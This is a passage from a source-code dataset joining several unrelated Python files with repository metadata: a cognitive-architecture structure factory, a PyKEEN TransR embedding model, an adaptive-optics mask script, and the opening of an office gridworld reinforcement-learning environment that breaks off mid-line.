dimensions=dimensions,\n sub_spaces=sub_spaces,\n links_in=self.new_set(),\n links_out=self.new_set(),\n parent_spaces=self.new_set(),\n possible_instances=possible_instances,\n is_basic_level=is_basic_level,\n is_symbolic=is_symbolic,\n super_space_to_coordinate_function_map=super_space_to_coordinate_function_map,\n champion_labels=self.new_set(),\n champion_relations=self.new_set(),\n )\n self.add(space)\n return space\n\n def new_contextual_space(\n self,\n name: str,\n parent_concept: Concept,\n conceptual_spaces: StructureSet,\n parent_id: str = \"\",\n is_main_input: bool = False,\n ) -> ContextualSpace:\n space = ContextualSpace(\n structure_id=ID.new(ContextualSpace),\n parent_id=parent_id,\n name=name,\n parent_concept=parent_concept,\n contents=self.new_set(),\n conceptual_spaces=conceptual_spaces,\n links_in=self.new_set(),\n links_out=self.new_set(),\n parent_spaces=self.new_set(),\n is_main_input=is_main_input,\n champion_labels=self.new_set(),\n champion_relations=self.new_set(),\n )\n self.add(space)\n return space\n\n # TODO: allow frames to be defined as children of other frames with only parts overwritten\n def new_frame(\n self,\n name: str,\n 
parent_concept: Concept,\n parent_frame: Frame,\n sub_frames: StructureSet,\n concepts: StructureSet,\n input_space: ContextualSpace,\n output_space: ContextualSpace,\n interspatial_links: StructureSet = None,\n parent_id: str = \"\",\n is_sub_frame: bool = False,\n depth: int = None,\n ) -> Frame:\n interspatial_links = (\n self.new_set() if interspatial_links is None else interspatial_links\n )\n frame = Frame(\n structure_id=ID.new(Frame),\n parent_id=parent_id,\n name=name,\n parent_concept=parent_concept,\n parent_frame=parent_frame,\n sub_frames=sub_frames,\n concepts=concepts,\n interspatial_links=interspatial_links,\n input_space=input_space,\n output_space=output_space,\n links_in=self.new_set(),\n links_out=self.new_set(),\n parent_spaces=self.new_set(),\n instances=self.new_set(),\n is_sub_frame=is_sub_frame,\n depth=depth,\n champion_labels=self.new_set(),\n champion_relations=self.new_set(),\n )\n if parent_frame is not None:\n parent_frame.instances.add(frame)\n self.add(frame)\n return frame\n\n def new_sub_frame(\n self,\n name: str,\n parent_concept: Concept,\n parent_frame: Frame,\n sub_frames: StructureSet,\n concepts: StructureSet,\n input_space: ContextualSpace,\n output_space: ContextualSpace,\n parent_id: str = \"\",\n ) -> Frame:\n return self.new_frame(\n name=name,\n parent_concept=parent_concept,\n parent_frame=parent_frame,\n sub_frames=sub_frames,\n concepts=concepts,\n input_space=input_space,\n output_space=output_space,\n parent_id=parent_id,\n is_sub_frame=True,\n )\n\n def new_chunk(\n self,\n locations: List[Location],\n parent_space: Space,\n members: StructureSet = None,\n parent_id: str = \"\",\n quality: FloatBetweenOneAndZero = 0.0,\n activation: FloatBetweenOneAndZero = 0.0,\n abstract_chunk: Chunk = None,\n is_raw: bool = False,\n ) -> Chunk:\n if members is None:\n members = self.new_set()\n locations.append(Location([[len(members)]], self.conceptual_spaces[\"size\"]))\n parent_spaces = self.new_set(*[location.space for location in locations])\n chunk = Chunk(\n structure_id=ID.new(Chunk),\n parent_id=parent_id,\n locations=locations,\n members=members,\n parent_space=parent_space,\n quality=quality,\n links_in=self.new_set(),\n links_out=self.new_set(),\n parent_spaces=parent_spaces,\n instances=self.new_set(),\n super_chunks=self.new_set(),\n sub_chunks=self.new_set(),\n abstract_chunk=abstract_chunk,\n is_raw=is_raw,\n champion_labels=self.new_set(),\n champion_relations=self.new_set(),\n )\n for existing_chunk in self.chunks:\n if not chunk.members.is_empty and all(\n member in existing_chunk.members for member in chunk.members\n ):\n chunk.super_chunks.add(existing_chunk)\n existing_chunk.sub_chunks.add(chunk)\n existing_chunk.recalculate_exigency()\n self.loggers[\"structure\"].log(existing_chunk)\n if not existing_chunk.members.is_empty and all(\n member in chunk.members for member in existing_chunk.members\n ):\n chunk.sub_chunks.add(existing_chunk)\n existing_chunk.super_chunks.add(chunk)\n existing_chunk.recalculate_exigency()\n self.loggers[\"structure\"].log(existing_chunk)\n if existing_chunk.is_raw and existing_chunk in chunk.members:\n existing_chunk.super_chunks.add(chunk)\n chunk.sub_chunks.add(existing_chunk)\n existing_chunk.recalculate_exigency()\n self.loggers[\"structure\"].log(existing_chunk)\n chunk._activation = activation\n self.add(chunk)\n return chunk\n\n def new_letter_chunk(\n self,\n name: Union[str, None],\n locations: List[Location],\n members: StructureSet = None,\n parent_space: Space = None,\n parent_id: str = 
\"\",\n quality: FloatBetweenOneAndZero = 0.0,\n left_branch: StructureSet = None,\n right_branch: StructureSet = None,\n meaning_concept: Concept = None,\n grammar_concept: Concept = None,\n abstract_chunk: LetterChunk = None,\n ) -> LetterChunk:\n if left_branch is None:\n left_branch = self.new_set()\n if right_branch is None:\n right_branch = self.new_set()\n if members is None:\n members = StructureSet.union(left_branch, right_branch)\n parent_spaces = self.new_set(*[location.space for location in locations])\n letter_chunk = LetterChunk(\n structure_id=ID.new(LetterChunk),\n parent_id=parent_id,\n name=name,\n locations=locations,\n members=members,\n parent_space=parent_space,\n quality=quality,\n left_branch=left_branch,\n right_branch=right_branch,\n links_in=self.new_set(),\n links_out=self.new_set(),\n parent_spaces=parent_spaces,\n instances=self.new_set(),\n super_chunks=self.new_set(),\n sub_chunks=self.new_set(),\n abstract_chunk=abstract_chunk,\n champion_labels=self.new_set(),\n champion_relations=self.new_set(),\n )\n for member in members:\n member.super_chunks.add(letter_chunk)\n member.recalculate_exigency()\n letter_chunk.sub_chunks.add(member)\n self.loggers[\"structure\"].log(member)\n self.add(letter_chunk)\n if meaning_concept is not None:\n self.new_relation(\n meaning_concept,\n letter_chunk,\n grammar_concept,\n quality=1.0,\n parent_id=parent_id,\n )\n if abstract_chunk is not None:\n abstract_chunk.instances.add(letter_chunk)\n return letter_chunk\n\n def new_concept(\n self,\n name: str,\n parent_id: str = \"\",\n locations: List[Location] = None,\n classifier: Classifier = None,\n instance_type: type = None,\n structure_type: type = None,\n parent_space: Space = None,\n distance_function: Callable = None,\n chunking_distance_function: Callable = None,\n possible_instances: StructureSet = None,\n subsumes: StructureSet = None,\n depth: int = 1,\n distance_to_proximity_weight: float = HyperParameters.DISTANCE_TO_PROXIMITY_WEIGHT,\n activation: FloatBetweenOneAndZero = None,\n is_slot: bool = False,\n reverse: Concept = None,\n ) -> Concept:\n locations = [] if locations is None else locations\n for location in locations:\n for sub_space in location.space.sub_spaces:\n if not any([l.space == sub_space for l in locations]):\n location_in_sub_space = (\n sub_space.location_from_super_space_location(location)\n )\n locations.append(location_in_sub_space)\n if parent_space is not None:\n if not any([location.space == parent_space for location in locations]):\n locations.append(\n Location(\n [[math.nan for _ in range(parent_space.no_of_dimensions)]],\n parent_space,\n )\n )\n parent_spaces = self.new_set(*[location.space for location in locations])\n possible_instances = (\n self.new_set() if possible_instances is None else possible_instances\n )\n subsumes = self.new_set() if subsumes is None else subsumes\n chunking_distance_function = (\n chunking_distance_function\n if chunking_distance_function is not None\n else distance_function\n )\n concept = Concept(\n structure_id=ID.new(Concept),\n parent_id=parent_id,\n name=name,\n locations=locations,\n classifier=classifier,\n instance_type=instance_type,\n structure_type=structure_type,\n parent_space=parent_space,\n child_spaces=self.new_set(),\n distance_function=distance_function,\n chunking_distance_function=chunking_distance_function,\n possible_instances=possible_instances,\n links_in=self.new_set(),\n links_out=self.new_set(),\n parent_spaces=parent_spaces,\n instances=self.new_set(),\n subsumes=subsumes,\n 
depth=depth,\n distance_to_proximity_weight=distance_to_proximity_weight,\n is_slot=is_slot,\n reverse=reverse,\n champion_labels=self.new_set(),\n champion_relations=self.new_set(),\n )\n if activation is not None:\n concept._activation = activation\n self.add(concept)\n return concept\n\n def new_compound_concept(\n self,\n root: Concept,\n args: List[Concept],\n parent_id: str = \"\",\n is_slot: bool = False,\n reverse: Concept = None,\n subsumes: StructureSet = None,\n ):\n subsumes = self.new_set() if subsumes is None else subsumes\n try:\n return self.concepts.where(\n is_compound_concept=True, root=root, args=args\n ).get()\n except MissingStructureError:\n parent_spaces = self.new_set(\n *[location.space for location in args[0].locations]\n )\n concept = CompoundConcept(\n structure_id=ID.new(Concept),\n parent_id=parent_id,\n root=root,\n args=args,\n child_spaces=self.new_set(),\n possible_instances=self.new_set(),\n links_in=self.new_set(),\n links_out=self.new_set(),\n parent_spaces=parent_spaces,\n instances=self.new_set(),\n subsumes=subsumes,\n champion_labels=self.new_set(),\n champion_relations=self.new_set(),\n is_slot=is_slot,\n reverse=reverse,\n )\n self.add(concept)\n self.new_relation(root, concept, quality=1.0, parent_id=parent_id)\n for arg in args:\n self.new_relation(arg, concept, quality=1.0, parent_id=parent_id)\n try:\n if all(\n arg.has_relation_with(\n self.concepts[\"more\"], parent_concept=self.concepts[\"more\"]\n )\n for arg in args\n ):\n self.new_relation(\n concept,\n self.concepts[\"more\"],\n self.concepts[\"more\"],\n quality=1.0,\n parent_id=parent_id,\n )\n elif all(\n arg.has_relation_with(\n self.concepts[\"less\"], parent_concept=self.concepts[\"more\"]\n )\n for arg in args\n ):\n self.new_relation(\n concept,\n self.concepts[\"less\"],\n self.concepts[\"more\"],\n quality=1.0,\n parent_id=parent_id,\n )\n except KeyError:\n pass\n return concept\n\n def new_correspondence(\n self,\n start: Structure,\n end: Structure,\n parent_concept: Concept,\n locations: List[Location] = None,\n conceptual_space: ConceptualSpace = None,\n parent_view: View = None,\n parent_id: str = \"\",\n quality: FloatBetweenOneAndZero = 0.0,\n is_excitatory: bool = True,\n is_privileged: bool = False,\n is_projection: bool = False,\n ) -> Correspondence:\n if locations is None:\n if start.parent_space is not None and end.parent_space is not None:\n locations = [\n start.location_in_space(start.parent_space),\n end.location_in_space(end.parent_space),\n ]\n else:\n locations = []\n parent_spaces = self.new_set(*[location.space for location in locations])\n correspondence = Correspondence(\n structure_id=ID.new(Correspondence),\n parent_id=parent_id,\n start=start,\n end=end,\n arguments=self.new_set(start, end),\n locations=locations,\n parent_concept=parent_concept,\n conceptual_space=conceptual_space,\n parent_view=parent_view,\n quality=quality,\n links_in=self.new_set(),\n links_out=self.new_set(),\n parent_spaces=parent_spaces,\n is_excitatory=is_excitatory,\n is_privileged=is_privileged,\n is_projection=is_projection,\n champion_labels=self.new_set(),\n champion_relations=self.new_set(),\n )\n start.links_out.add(correspondence)\n start.links_in.add(correspondence)\n start.recalculate_exigency()\n end.links_out.add(correspondence)\n end.links_in.add(correspondence)\n end.recalculate_exigency()\n self.add(correspondence)\n while parent_view is not None:\n parent_view.add(correspondence)\n parent_view.recalculate_exigency()\n 
self.loggers[\"structure\"].log(parent_view)\n try:\n parent_view = parent_view.super_views.get()\n except MissingStructureError:\n parent_view = None\n self.loggers[\"structure\"].log(start)\n self.loggers[\"structure\"].log(end)\n return correspondence\n\n def new_label(\n self,\n start: Structure,\n parent_concept: Concept,\n locations: List[Location],\n parent_id: str = \"\",\n quality: FloatBetweenOneAndZero = 0.0,\n parent_space: ContextualSpace = None,\n is_interspatial: bool = False,\n activation: FloatBetweenOneAndZero = None,\n ) -> Label:\n parent_space = start.parent_space if parent_space is None else parent_space\n parent_spaces = self.new_set(*[location.space for location in locations])\n label = Label(\n structure_id=ID.new(Label),\n parent_id=parent_id,\n start=start,\n arguments=self.new_set(start),\n parent_concept=parent_concept,\n locations=locations,\n quality=quality,\n parent_space=parent_space,\n links_in=self.new_set(),\n links_out=self.new_set(),\n parent_spaces=parent_spaces,\n champion_labels=self.new_set(),\n champion_relations=self.new_set(),\n is_interspatial=is_interspatial,\n )\n if activation is not None:\n label._activation = activation\n if start is not None:\n start.links_out.add(label)\n start.recalculate_exigency()\n self.loggers[\"structure\"].log(start)\n self.add(label)\n parent_concept.instances.add(label)\n return label\n\n def new_relation(\n self,\n start: Structure,\n end: Structure,\n parent_concept: Concept = None,\n locations: List[Location] = None,\n parent_id: str = \"\",\n quality: FloatBetweenOneAndZero = 0.0,\n parent_space: ContextualSpace = None,\n conceptual_space: ConceptualSpace = None,\n is_bidirectional: bool = True,\n is_excitatory: bool = True,\n is_interspatial: bool = False,\n activation: FloatBetweenOneAndZero = None,\n stable_activation: FloatBetweenOneAndZero = None,\n ) -> Relation:\n parent_space = (\n start.parent_space\n if parent_space is None and start.parent_space == end.parent_space\n else parent_space\n )\n locations = [] if locations is None else locations\n parent_spaces = self.new_set(*[location.space for location in locations])\n relation = Relation(\n structure_id=ID.new(Relation),\n parent_id=parent_id,\n start=start,\n end=end,\n arguments=self.new_set(start, end),\n parent_concept=parent_concept,\n conceptual_space=conceptual_space,\n locations=locations,\n quality=quality,\n parent_space=parent_space,\n links_in=self.new_set(),\n links_out=self.new_set(),\n parent_spaces=parent_spaces,\n is_bidirectional=is_bidirectional,\n is_excitatory=is_excitatory,\n is_stable=stable_activation is not None,\n is_interspatial=is_interspatial,\n champion_labels=self.new_set(),\n champion_relations=self.new_set(),\n )\n if activation is not None:\n relation._activation = activation\n if stable_activation is not None:\n relation._activation = stable_activation\n start.links_out.add(relation)\n end.links_in.add(relation)\n start.recalculate_exigency()\n end.recalculate_exigency()\n self.add(relation)\n if parent_concept is not None:\n if is_interspatial:\n try:\n parent_concept.relations.where(\n parent_concept=self.concepts[\"outer\"]\n ).get().end.instances.add(relation)\n except MissingStructureError:\n pass\n else:\n parent_concept.instances.add(relation)\n if None not in {parent_concept, conceptual_space}:\n try:\n concept_to_space_concept = (\n parent_concept.relations.where(\n parent_concept=conceptual_space.parent_concept\n )\n .get()\n .end\n )\n if is_interspatial:\n concept_to_space_concept.relations.where(\n 
parent_concept=self.concepts[\"outer\"]\n ).get().end.instances.add(relation)\n else:\n concept_to_space_concept.instances.add(relation)\n except MissingStructureError:\n pass\n self.loggers[\"structure\"].log(start)\n self.loggers[\"structure\"].log(end)\n return relation\n\n def new_view(self) -> View:\n raise NotImplementedError\n","repo_name":"georgeawright/linguoplotter","sub_path":"linguoplotter/bubble_chamber.py","file_name":"bubble_chamber.py","file_ext":"py","file_size_in_byte":32791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"32968237649","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Implementation of TransR.\"\"\"\n\nfrom typing import Optional\n\nimport torch\nimport torch.autograd\nfrom torch import nn\nfrom torch.nn import functional\n\nfrom ..base import EntityRelationEmbeddingModel\nfrom ..init import embedding_xavier_uniform_\nfrom ...losses import Loss\nfrom ...regularizers import Regularizer\nfrom ...triples import TriplesFactory\nfrom ...utils import clamp_norm, get_embedding\n\n__all__ = [\n 'TransR',\n]\n\n\nclass TransR(EntityRelationEmbeddingModel):\n r\"\"\"An implementation of TransR from [lin2015]_.\n\n TransR is an extension of :class:`pykeen.models.TransH` that explicitly considers entities and relations as\n different objects and therefore represents them in different vector spaces.\n\n For a triple $(h,r,t) \\in \\mathbb{K}$, the entity embeddings, $\\textbf{e}_h, \\textbf{e}_t \\in \\mathbb{R}^d$,\n are first projected into the relation space by means of a relation-specific projection matrix\n $\\textbf{M}_{r} \\in \\mathbb{R}^{k \\times d}$. With relation embedding $\\textbf{r}_r \\in \\mathbb{R}^k$, the\n interaction model is defined similarly to TransE with:\n\n .. math::\n\n f(h,r,t) = -\\|\\textbf{M}_{r}\\textbf{e}_h + \\textbf{r}_r - \\textbf{M}_{r}\\textbf{e}_t\\|_{p}^2\n\n The following constraints are applied:\n\n * $\\|\\textbf{e}_h\\|_2 \\leq 1$\n * $\\|\\textbf{r}_r\\|_2 \\leq 1$\n * $\\|\\textbf{e}_t\\|_2 \\leq 1$\n * $\\|\\textbf{M}_{r}\\textbf{e}_h\\|_2 \\leq 1$\n * $\\|\\textbf{M}_{r}\\textbf{e}_t\\|_2 \\leq 1$\n\n .. 
seealso::\n\n - OpenKE `TensorFlow implementation of TransR\n `_\n - OpenKE `PyTorch implementation of TransR\n `_\n \"\"\"\n\n #: The default strategy for optimizing the model's hyper-parameters\n hpo_default = dict(\n embedding_dim=dict(type=int, low=20, high=300, q=50),\n relation_dim=dict(type=int, low=20, high=300, q=50),\n scoring_fct_norm=dict(type=int, low=1, high=2),\n )\n\n def __init__(\n self,\n triples_factory: TriplesFactory,\n embedding_dim: int = 50,\n automatic_memory_optimization: Optional[bool] = None,\n relation_dim: int = 30,\n scoring_fct_norm: int = 1,\n loss: Optional[Loss] = None,\n preferred_device: Optional[str] = None,\n random_seed: Optional[int] = None,\n regularizer: Optional[Regularizer] = None,\n ) -> None:\n \"\"\"Initialize the model.\"\"\"\n super().__init__(\n triples_factory=triples_factory,\n embedding_dim=embedding_dim,\n relation_dim=relation_dim,\n automatic_memory_optimization=automatic_memory_optimization,\n loss=loss,\n preferred_device=preferred_device,\n random_seed=random_seed,\n regularizer=regularizer,\n )\n self.scoring_fct_norm = scoring_fct_norm\n\n # embeddings\n self.relation_projections = get_embedding(\n num_embeddings=triples_factory.num_relations,\n embedding_dim=relation_dim * embedding_dim,\n device=self.device,\n )\n\n # Finalize initialization\n self.reset_parameters_()\n\n def post_parameter_update(self) -> None: # noqa: D102\n # Make sure to call super first\n super().post_parameter_update()\n\n # Normalize entity embeddings\n self.entity_embeddings.weight.data = clamp_norm(x=self.entity_embeddings.weight.data, maxnorm=1., p=2, dim=-1)\n self.relation_embeddings.weight.data = clamp_norm(\n x=self.relation_embeddings.weight.data,\n maxnorm=1.,\n p=2,\n dim=-1,\n )\n\n def _reset_parameters_(self): # noqa: D102\n # TODO: Initialize from TransE\n embedding_xavier_uniform_(self.entity_embeddings)\n embedding_xavier_uniform_(self.relation_embeddings)\n # Initialise relation embeddings to unit length\n functional.normalize(self.relation_embeddings.weight.data, out=self.relation_embeddings.weight.data)\n nn.init.xavier_uniform_(self.relation_projections.weight.view(\n self.num_relations, self.embedding_dim, self.relation_dim))\n\n @staticmethod\n def interaction_function(\n h: torch.FloatTensor,\n r: torch.FloatTensor,\n t: torch.FloatTensor,\n m_r: torch.FloatTensor,\n ) -> torch.FloatTensor:\n \"\"\"Evaluate the interaction function for given embeddings.\n\n The embeddings have to be in a broadcastable shape.\n\n :param h: shape: (batch_size, num_entities, d_e)\n Head embeddings.\n :param r: shape: (batch_size, num_entities, d_r)\n Relation embeddings.\n :param t: shape: (batch_size, num_entities, d_e)\n Tail embeddings.\n :param m_r: shape: (batch_size, num_entities, d_e, d_r)\n The relation specific linear transformations.\n\n :return: shape: (batch_size, num_entities)\n The scores.\n \"\"\"\n # project to relation specific subspace, shape: (b, e, d_r)\n h_bot = h @ m_r\n t_bot = t @ m_r\n # ensure constraints\n h_bot = clamp_norm(h_bot, p=2, dim=-1, maxnorm=1.)\n t_bot = clamp_norm(t_bot, p=2, dim=-1, maxnorm=1.)\n\n # evaluate score function, shape: (b, e)\n return -torch.norm(h_bot + r - t_bot, dim=-1) ** 2\n\n def score_hrt(self, hrt_batch: torch.LongTensor) -> torch.FloatTensor: # noqa: D102\n # Get embeddings\n h = self.entity_embeddings(hrt_batch[:, 0]).unsqueeze(dim=1)\n r = self.relation_embeddings(hrt_batch[:, 1]).unsqueeze(dim=1)\n t = self.entity_embeddings(hrt_batch[:, 2]).unsqueeze(dim=1)\n m_r = 
self.relation_projections(hrt_batch[:, 1]).view(-1, self.embedding_dim, self.relation_dim)\n\n return self.interaction_function(h=h, r=r, t=t, m_r=m_r).view(-1, 1)\n\n def score_t(self, hr_batch: torch.LongTensor) -> torch.FloatTensor: # noqa: D102\n # Get embeddings\n h = self.entity_embeddings(hr_batch[:, 0]).unsqueeze(dim=1)\n r = self.relation_embeddings(hr_batch[:, 1]).unsqueeze(dim=1)\n t = self.entity_embeddings.weight.unsqueeze(dim=0)\n m_r = self.relation_projections(hr_batch[:, 1]).view(-1, self.embedding_dim, self.relation_dim)\n\n return self.interaction_function(h=h, r=r, t=t, m_r=m_r)\n\n def score_h(self, rt_batch: torch.LongTensor) -> torch.FloatTensor: # noqa: D102\n # Get embeddings\n h = self.entity_embeddings.weight.unsqueeze(dim=0)\n r = self.relation_embeddings(rt_batch[:, 0]).unsqueeze(dim=1)\n t = self.entity_embeddings(rt_batch[:, 1]).unsqueeze(dim=1)\n m_r = self.relation_projections(rt_batch[:, 0]).view(-1, self.embedding_dim, self.relation_dim)\n\n return self.interaction_function(h=h, r=r, t=t, m_r=m_r)\n","repo_name":"MindRank-Biotech/PharmKG","sub_path":"model/pykeen/pykeen/src/pykeen/models/unimodal/trans_r.py","file_name":"trans_r.py","file_ext":"py","file_size_in_byte":6880,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"47"} +{"seq_id":"19910383162","text":"from astropy.io import fits\n\nimport numpy as np\n\nimport logging\n\nfrom typing import Tuple\nfrom collections import namedtuple\n\nPercentileParam = namedtuple('PercentileParam', ['p0', 'c0', 'p1', 'c1'])\n\n\ndef make_masks_fitsio(\n file_in_resp: str, # conf/RMmodesWFS/zrespM-H.fits\n dm_perc: PercentileParam = PercentileParam(p0=0.2, c0=0.5, p1=0.5,\n c1=0.5),\n wfs_perc: PercentileParam = PercentileParam(p0=0.2, c0=0.5, p1=0.5,\n c1=0.5),\n *,\n dm_size: Tuple[int, int] = (50, 50)) -> None:\n '''\n Replacement of RMmkmask cacao bash script\n\n file_in_resp:\n Response obtained through measlinresp - decoded - corresponds to zrespM-H.fits\n\n dm_perc:\n PercentileParam - percentiles for DMmask truncation\n wfs_perc:\n PercentileParam - percentiles for WFSmask truncation\n\n '''\n\n resp_matrix = fits.getdata(file_in_resp)\n\n dm_n, wfs_size_i, wfs_size_j = resp_matrix.shape\n\n assert dm_n == dm_size[0] * dm_size[1]\n\n # Re-arrange into 4D tensor\n resp_4D = resp_matrix.reshape(*dm_size, wfs_size_i, wfs_size_j)\n\n dm_map, dm_mask, wfs_map, wfs_mask = make_masks(resp_4D, dm_perc, wfs_perc)\n\n fits.writeto('./conf/dmmap.fits', dm_map, overwrite=True)\n fits.writeto('./conf/dmmask.fits', dm_mask.astype(np.float32),\n overwrite=True)\n fits.writeto('./conf/wfsmap.fits', wfs_map, overwrite=True)\n fits.writeto('./conf/wfsmask.fits', wfs_mask.astype(np.float32),\n overwrite=True)\n\n\ndef make_masks(\n resp_4D: np.ndarray,\n dm_perc: PercentileParam,\n wfs_perc: PercentileParam,\n) -> Tuple[np.ndarray, np.ndarray, np.ndarray, np.ndarray]:\n '''\n\n '''\n\n # Dimension checks\n assert resp_4D.ndim == 4, \"resp_matrix not 4D\"\n\n dm_map = np.sum(resp_4D**2, axis=(2, 3))\n wfs_map = np.sum(resp_4D**2, axis=(0, 1))\n\n dm_mask = apply_percentile_masker(dm_map, dm_perc)\n wfs_mask = apply_percentile_masker(wfs_map, wfs_perc)\n\n return dm_map, dm_mask, wfs_map, wfs_mask\n\n\ndef apply_percentile_masker(map: np.ndarray, perc: PercentileParam):\n\n p0_val, p1_val = np.percentile(map, (perc.p0 * 100, perc.p1 * 100))\n\n return map > (p0_val * perc.c0 + p1_val * perc.c1)\n\n\nif __name__ == \"__main__\":\n\n 
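# Hedged usage sketch -- the response-matrix path comes from the comment in\n    # make_masks_fitsio's signature above and is an assumption, not a fixed location:\n    #\n    #   make_masks_fitsio('conf/RMmodesWFS/zrespM-H.fits',\n    #                     dm_perc=PercentileParam(p0=0.2, c0=0.5, p1=0.5, c1=0.5),\n    #                     wfs_perc=PercentileParam(p0=0.2, c0=0.5, p1=0.5, c1=0.5))\n    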
pass\n","repo_name":"cacao-org/cacao","sub_path":"pycacao/calib/mkmasks.py","file_name":"mkmasks.py","file_ext":"py","file_size_in_byte":2383,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"47"} +{"seq_id":"24718370806","text":"from ast import literal_eval\nimport gym\nimport numpy as np\nfrom gym import spaces\nfrom gym.utils import seeding\n\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\nimport matplotlib.colors as colors\nfrom collections import defaultdict\nfrom itertools import chain, combinations\nfrom copy import deepcopy\n\nfrom enum import IntEnum\nfrom sympy.logic import boolalg\nfrom sympy import sympify, Symbol\n\nCOLOURS = {0: [1, 1, 1], 1: [0.0, 0.0, 0.0], 3: [0.9,0.9,0.9], 10: [0, 0, 1], 20:[1, 1, 0.0], 21:[0.8, 0.8, 0.8]}\n\n\n### Predicates base class\n\nclass GridWorld_Object():\n def __init__(self, positions=[], count=float('inf'), track=False):\n self.track = track\n self.positions = positions\n self._count = lambda: count if count else np.random.randint(3)\n \n self.achieved = False\n self.count = {position: self._count() for position in self.positions}\n\n def reset(self):\n self.count = {position: self._count() for position in self.positions}\n self.achieved = False\n return None\n \n def state(self, position):\n achieved = False\n if (position in self.count) and self.count[position]:\n self.count[position] -= 1\n achieved = True\n \n achieved = self.achieved or achieved\n if self.track:\n self.achieved = achieved\n \n state = []\n for position in self.positions:\n state.append(self.count[position]>0)\n \n return achieved, tuple(state)\n\n\n### Office world objects\n\nMAP = \"LT T T T RT LT T T T RT\\n\" \\\n \"L 0 0 0 R L 0 0 0 R\\n\" \\\n \"L 0 0 0 0 0 0 0 0 R\\n\" \\\n \"L 0 0 0 R L 0 0 0 R\\n\" \\\n \"LD D 0 D RD LD D 0 D RD\\n\" \\\n \"LT T 0 T RT LT T 0 T RT\\n\" \\\n \"L 0 0 0 R L 0 0 0 R\\n\" \\\n \"L 0 0 0 0 0 0 0 0 R\\n\" \\\n \"L 0 0 0 R L 0 0 0 R\\n\" \\\n \"LD D D D RD LD D D D RD\"\n\nclass roomA(GridWorld_Object):\n def __init__(self):\n positions = [(2,2)]\n super().__init__(positions)\n \nclass roomB(GridWorld_Object):\n def __init__(self):\n positions = [(2,7)]\n super().__init__(positions)\n \nclass roomC(GridWorld_Object):\n def __init__(self):\n positions = [(7,7)]\n super().__init__(positions)\n \nclass roomD(GridWorld_Object):\n def __init__(self):\n positions = [(7,2)]\n super().__init__(positions)\n\n# class door1(GridWorld_Object):\n# def __init__(self):\n# positions = [(7,2)]\n# super().__init__(positions)\n\n# class coffee(GridWorld_Object):\n# def __init__(self):\n# positions = [(3,5),(9,11)]\n# super().__init__(positions)\n\n# class mail(GridWorld_Object):\n# def __init__(self, count=0):\n# positions = [(6,10)]\n# super().__init__(positions, count)\n\n# class office(GridWorld_Object):\n# def __init__(self, count=0):\n# positions = [(6,6)]\n# super().__init__(positions, count)\n\n# class decor(GridWorld_Object):\n# def __init__(self, track=True):\n# # positions = [(6,2),(6,14),(2,6),(2,10),(10,6),(10,10),(2,2),(2,14),(10,14),(10,2)] # If room predicates are not used\n# positions = [(6,2),(6,14),(2,6),(2,10),(10,6),(10,10)]\n# super().__init__(positions, track=track)\n\ngridworld_objects = {\n '1room': roomA(),\n '2room': roomB(),\n '3room': roomC(),\n '4room': roomD(),\n # '10door': door1(),\n # '20door': door2(),\n # '30door': door3(),\n # '40door': door4(),\n # 'decor': decor(),\n # 'coffee': coffee(),\n # 'mail': mail(),\n # 'office': office(),\n}\n\n# Defining actions and 
directions\nclass Directions(IntEnum):\n    # Move up, move right, move down, move left\n    up = 0\n    right = 1 \n    down = 2\n    left = 3\nclass PolarActions(IntEnum):\n    # Move up, rotate right, rotate left, done\n    up = 0\n    right = 1\n    left = 2\n    done = 3 \n\n### GridWorld environment\n\nclass GridWorld(gym.Env):\n    metadata = {'render.modes': ['human']}\n    def __init__(self, MAP=MAP, gridworld_objects=gridworld_objects, goal_reward=10, step_reward=-0.1, start_position=None, start_direction=None, has_doors=True, slip_prob=0):\n\n        self.n = None\n        self.m = None\n\n        self.grid = None\n        self.hallwayStates = None\n        self.possiblePositions = []\n        self.walls = []\n        \n        self.MAP = MAP\n        self._map_init()\n        self.diameter = (self.n+self.m)-4\n        self.directions = Directions\n        self.actions = PolarActions\n\n        self.done = False\n        \n        self.slip_prob = slip_prob\n        \n        self.gridworld_objects = gridworld_objects\n        self.gridworld_objects_keys =tuple(sorted(list(self.gridworld_objects.keys())))\n\n        self.start_position = start_position\n        self.start_direction = start_direction\n        self.position = self.start_position if start_position else self.possiblePositions[0]\n        self.direction = self.start_direction if start_direction else self.directions.up\n        self.step_count = 0\n        \n        object_states = []\n        for i in self.gridworld_objects_keys:\n            object_states.append(self.gridworld_objects[i].state(self.position))\n        self.state = self.position,tuple(object_states)\n\n        # Rewards\n        self.goal_reward = goal_reward\n        self.step_reward = step_reward\n        self.rmax = goal_reward\n        self.rmin = step_reward\n        \n        # Gym spaces for observation and action space\n        self.observation_space = spaces.Discrete(len(self.possiblePositions))\n        self.action_space = spaces.Discrete(len(self.actions))\n\n        ##################### Goals\n        self.GoalLocations = {}\n        self.Doors = {}\n        self.closed_doors = []\n        \n        self.has_doors = has_doors\n        if self.has_doors:\n            self.Doors[(2,4)] = \"n\"\n            self.Doors[(2,5)] = \"n\"\n            self.Doors[(7,4)] = \"s\"\n            self.Doors[(7,5)] = \"s\"\n            self.Doors[(4,2)] = \"w\"\n            self.Doors[(5,2)] = \"w\"\n            self.Doors[(4,7)] = \"e\"\n            self.Doors[(5,7)] = \"e\"\n        self.doors = set(list(self.Doors.values()))\n        self.closed_doors = self.doors.copy()\n    \n    def seed(self, seed=None):\n        self.np_random, seed = seeding.np_random(seed)\n        np.random.seed(seed)\n        return [seed]\n    \n    def perturb_action(self, action): \n        a = 1-self.slip_prob\n        b = self.slip_prob/(self.action_space.n-2)\n        if action == self.actions.up:\n            probs = [a,b,b,b]\n        elif action == self.actions.right:\n            probs = [b,a,b,b]\n        elif hasattr(self.actions, 'down') and action == self.actions.down:\n            probs = [b,b,a,b]\n        elif action == self.actions.left:\n            probs = [b,b,b,a]\n        else:\n            return action\n        action = np.random.choice(np.arange(len(probs)), p=probs) \n        return action\n\n    def step(self, action):\n        assert self.action_space.contains(action)\n\n        action = action #self.perturb_action(action)\n        reward = self._get_reward(self.state, action)\n        \n        x, y = self.position \n        cell = str(self._get_grid_value(self.position))\n        if action == self.actions.up:\n            wall = (self.direction==self.directions.up and 'T' in cell) or (self.direction==self.directions.right and 'R' in cell) or 